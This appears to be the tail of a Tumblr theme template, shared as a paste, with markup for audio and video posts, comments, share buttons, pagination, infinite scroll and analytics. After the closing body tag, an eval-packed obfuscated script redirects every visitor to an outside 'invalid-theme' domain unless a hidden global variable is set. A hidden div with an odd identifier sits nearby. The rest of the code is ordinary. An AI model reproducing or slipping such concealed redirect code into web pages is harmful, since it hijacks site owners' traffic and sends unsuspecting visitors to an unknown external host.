- {block:Audio}
- <div class="album_container left">
- <div class="album_light_effect"></div>
- <img class="audioimage" src="{block:AlbumArt}{AlbumArtURL}{/block:AlbumArt}" alt="{block:Artist}{Artist}{/block:Artist}{block:TrackName} - {TrackName}{/block:TrackName}" />
- </div>
- <ul class="audiotrack left">
- {block:TrackName}<li class="artistLabel"><h3>{TrackName}</h3></li>{/block:TrackName}
- {block:Artist}<li class="trackLabel">by <b>{Artist}</b></li>{/block:Artist}
- <li class="audio" id="{postID}">
- <div class="audioplayercontainer left">
- <div class="audioplayerinto done" id="{postID}">{AudioPlayerWhite}</div>
- </div>
- <span class="left">
- {block:PlayCount}{PlayCountWithLabel}{/block:PlayCount}
- {block:ExternalAudio}
- <a href="{ExternalAudioURL}" target="_blank">+</a>
- {/block:ExternalAudio}
- </span>
- <div class="clear"></div>
- </li>
- </ul>
- <div class="clear"></div>
- {block:Caption}
- <section class="caption">{Caption}</section>
- {/block:Caption}
- {/block:Audio}
- {block:Video}
- <header class="videoPost {block:IndexPage}done{/block:IndexPage}" id="{PostID}">
- {block:IfNotPostWidth700}{Video-500}{/block:IfNotPostWidth700}{block:IfPostWidth700}{Video-700}{/block:IfPostWidth700}
- </header>
- {block:Caption}
- <section class="caption">{Caption}</section>
- {/block:Caption}
- {/block:Video}
- {block:Date}
- <footer class="underPost">
- {block:HasTags}<a href="javascript:void(0)" class="clickTag" id="{PostID}"><span class="icon-tags"></span>tags</a>{/block:HasTags}
- <a href="{Permalink}"><span class="icon-heart"></span>{NoteCount}</a>
- <a href="{ReblogURL}" target="_blank" {block:Answer}style="display:none;"{/block:Answer}><span class="icon-retweet"></span>reblog</a>
- </footer>
- {/block:Date}
- </div><!-- .posts -->
- {block:HasTags}
- <section class="tagContainer tagContainer_{PostID}">
- <ul>
- {block:Tags}<li><a class="tags" href="{TagURL}" {Target}>{Tag}</a></li>{/block:Tags}
- </ul>
- </section>
- {/block:HasTags}
- {block:PermalinkPage}
- {block:Date}
- {block:IfDisqusID}
- <div class="posts">
- <div id="disqus_thread"></div>
- <script type="text/javascript">
- var disqus_shortname = '{text:Disqus ID}';
- var disqus_url = '{Permalink}';
- var disqus_title = '{block:PostTitle}{PostTitle}{/block:PostTitle}';
- (function() {
- var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
- dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
- (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
- })();
- </script>
- <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
- <a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
- </div>
- {/block:IfDisqusID}
- <div class="posts" id="postnotesdiv">
- {block:NoteCount}
- <h3 style="margin-top:0px;">{NoteCountWithLabel}</h3>
- {/block:NoteCount}
- {block:RebloggedFrom}
- Reblogged from <a href="{ReblogParentURL}">{ReblogParentName}</a>, posted by <a href="{ReblogRootURL}">{ReblogRootName}</a><br><br>
- {/block:RebloggedFrom}
- {block:IfShowSocialShareButtons}
- <div id="socialButtons" class="left">
- <div style="display:inline-block;"><g:plusone annotation="none" size="medium" href="{Permalink}"></g:plusone></div>
- <span style="margin-left: 5px;"><a href="https://twitter.com/share" class="twitter-share-button" data-count="none" {block:IfTwitterUsername}data-via="{text:Twitter Username}" data-related="{text:Twitter Username}"{/block:IfTwitterUsername} data-hashtags="tumblr">Tweet</a>
- <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></span>
- <span style="margin-left: 5px;"><iframe id="facebookiframe" src="http://www.facebook.com/plugins/like.php?locale=en_US&href={Permalink}&width=48&colorscheme=light&layout=button_count" scrolling="no" frameborder='0' style="border:none; overflow:hidden; width:48px; height:20px;"></iframe></span>
- </div>
- {/block:IfShowSocialShareButtons}
- {block:PermalinkPagination}
- <div id="paginationPost" class="right">
- {block:NextPost}<a href="{NextPost}"><span>«</span> Prev </a>{/block:NextPost}
- {block:PreviousPost}<a href="{PreviousPost}"> Next <span>»</span></a>{/block:PreviousPost}
- </div>
- {/block:PermalinkPagination}
- <div class="clear"></div>
- {block:PostNotes}
- <div id="postnotes">{PostNotes}</div>
- {/block:PostNotes}
- </div>
- {/block:Date}
- {/block:PermalinkPage}
- </article>
- {block:Posts}
- {block:IndexPage}
- {block:Pagination}
- <footer id="pagination">
- <ul>
- {block:PreviousPage}
- <li><a href="{PreviousPage}">«</a></li>
- {/block:PreviousPage}
- {block:JumpPagination length="5"}
- {block:CurrentPage}
- <li><span>{PageNumber}</span></li>
- {/block:CurrentPage}
- {block:JumpPage}
- <li><a href="{URL}">{PageNumber}</a></li>
- {/block:JumpPage}
- {/block:JumpPagination}
- {block:NextPage}
- <li><a id="nextPage" href="{NextPage}">»</a></li>
- {/block:NextPage}
- </ul>
- </footer>
- {/block:Pagination}
- {/block:IndexPage}
- </div><!-- #content -->
- <div class="clear"></div>
- </section><!-- #container -->
- <div id="backTop">^</div>
- <div id="old_guid" style="display:none;">45e1d44587-djke882-673890shyya0-dopwnn1</div>
- <script src="https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js"></script>
- <style>
- /* desert scheme ported from vim to google prettify */
- pre.prettyprint {
- border: 0 !important;
- padding: 20px;
- display: block;
- background-color: #333;
- -webkit-border-radius: 3px;
- -moz-border-radius: 3px;
- border-radius: 3px;
- margin: 20px 0px;
- -moz-tab-size: 4;
- -o-tab-size: 4;
- -webkit-tab-size: 4;
- -ms-tab-size: 4;
- tab-size: 4;
- }
- pre .nocode { background-color: none; color: #000 }
- pre .str { color: #ffa0a0 } /* string - pink */
- pre .kwd { color: #f0e68c; font-weight: bold }
- pre .com { color: #87ceeb } /* comment - skyblue */
- pre .typ { color: #98fb98 } /* type - lightgreen */
- pre .lit { color: #cd5c5c } /* literal - darkred */
- pre .pun { color: #fff } /* punctuation */
- pre .pln { color: #fff } /* plaintext */
- pre .tag { color: #f0e68c; font-weight: bold } /* html/xml tag - lightyellow */
- pre .atn { color: #bdb76b; font-weight: bold } /* attribute name - khaki */
- pre .atv { color: #ffa0a0 } /* attribute value - pink */
- pre .dec { color: #98fb98 } /* decimal - lightgreen */
- /* Specify class=linenums on a pre to get line numbering */
- ol.linenums { margin-top: 0; margin-bottom: 0; color: #AEAEAE } /* IE indents via margin-left */
- li.L0,li.L1,li.L2,li.L3,li.L5,li.L6,li.L7,li.L8 { list-style-type: none }
- /* Alternate shading for lines */
- li.L1,li.L3,li.L5,li.L7,li.L9 { }
- @media print {
- pre.prettyprint { background-color: none; border: 0 !important; }
- pre .str, code .str { color: #060 }
- pre .kwd, code .kwd { color: #006; font-weight: bold }
- pre .com, code .com { color: #600; font-style: italic }
- pre .typ, code .typ { color: #404; font-weight: bold }
- pre .lit, code .lit { color: #044 }
- pre .pun, code .pun { color: #440 }
- pre .pln, code .pln { color: #000 }
- pre .tag, code .tag { color: #006; font-weight: bold }
- pre .atn, code .atn { color: #404 }
- pre .atv, code .atv { color: #060 }
- }
- </style>
- <script type="text/javascript" src="http://static.tumblr.com/dbek3sy/8Aqmgryi7/jquery_18.js"></script>
- {block:IfInfinitescroll}
- <script type="text/javascript" src="http://static.tumblr.com/dbek3sy/Qyblrgjfn/jqueryinfintescroll.js"></script>
- {/block:IfInfinitescroll}
- <script type="text/javascript">
- $(".clickTag").live("click", function(){
- var tagID = $(this).attr("id");
- $(".tagContainer_"+tagID).slideToggle();
- });
- $(function(){
- var topDiv = $("#backTop");
- var topDivTop = "640";
- var view = $( window );
- view.bind("scroll resize", function(){
- var viewTop = view.scrollTop();
- if (viewTop > topDivTop){
- topDiv.fadeIn(300);
- }
- else if (viewTop < topDivTop){
- topDiv.fadeOut(200);
- }
- });
- $("#backTop").click(function(){
- var target = $("html");
- $('html, body').animate({
- scrollTop: target.offset().top
- }, 1000);
- });
- });
- var $content = $("#content");
- {block:IfInfinitescroll}
- $content.infinitescroll({
- navSelector : '#pagination',
- nextSelector : '#pagination a#nextPage',
- itemSelector : '.post-wrap',
- loading: {
- finishedMsg: '',
- img: '', //http://static.tumblr.com/dbek3sy/pX1lrx8xv/ajax-loader.gif
- msgText : '<div id="floatingBarsG"><div class="blockG" id="rotateG_01"></div><div class="blockG" id="rotateG_02"></div><div class="blockG" id="rotateG_03"></div><div class="blockG" id="rotateG_04"></div><div class="blockG" id="rotateG_05"></div><div class="blockG" id="rotateG_06"></div><div class="blockG" id="rotateG_07"></div><div class="blockG" id="rotateG_08"></div></div>'
- },
- bufferPx : 600,
- debug : false,
- },
- function(newElements){
- var $newElems = $(newElements);
- $newElems.hide();
- $newElems.appendTo($content).fadeIn();
- /* repair audio players*/
- $('.audioplayerinto.done').each(function(){
- var audioID = $(this).attr("id");
- var $audioPost = $(this);
- $.ajax({
- url: '{URL}/api/read/json?id=' + audioID,
- dataType: 'jsonp',
- timeout: 50000,
- success: function(data){
- $audioPost.html(data.posts[0]["audio-player"]);
- $audioPost.removeClass("audio");
- }
- });
- $audioPost.removeClass("done");
- });
- /* repair video players*/
- $('.videoPost.done').each(function(){
- var videoID = $(this).attr("id");
- var $videoPost = $(this);
- if($videoPost.find("div#tumblr_video_container_"+videoID).length){
- $.ajax({
- url: '{URL}/api/read/json?id=' + videoID,
- dataType: 'jsonp',
- timeout: 50000,
- success: function(data){
- $videoPost.html(data.posts[0]["video-player-500"]);
- }
- });
- }
- $videoPost.removeClass("done");
- });
- });
- {/block:IfInfinitescroll}
- </script>
- <script type="text/javascript">
- (function() {
- var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
- po.src = 'https://apis.google.com/js/plusone.js';
- var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
- })();
- </script>
- {block:IfGoogleAnalyticsID}
- <script type="text/javascript">
- var _gaq = _gaq || [];
- _gaq.push(['_setAccount', '{text:Google Analytics ID}']);
- _gaq.push(['_trackPageview']);
- (function() {
- var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
- ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
- var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
- })();
- </script>
- {/block:IfGoogleAnalyticsID}
- </body>
- <script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b{a(c!=e){5.3.6="2://0-4.7/9-0/?8=1"}}f(d){5.3.6="2://0-4.7/9-0/?8=1"}',16,16,'theme||http|location|cloud|window|href|co|id|invalid|if|try|g_T|ex|true|catch'.split('|'),0,{}))</script>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement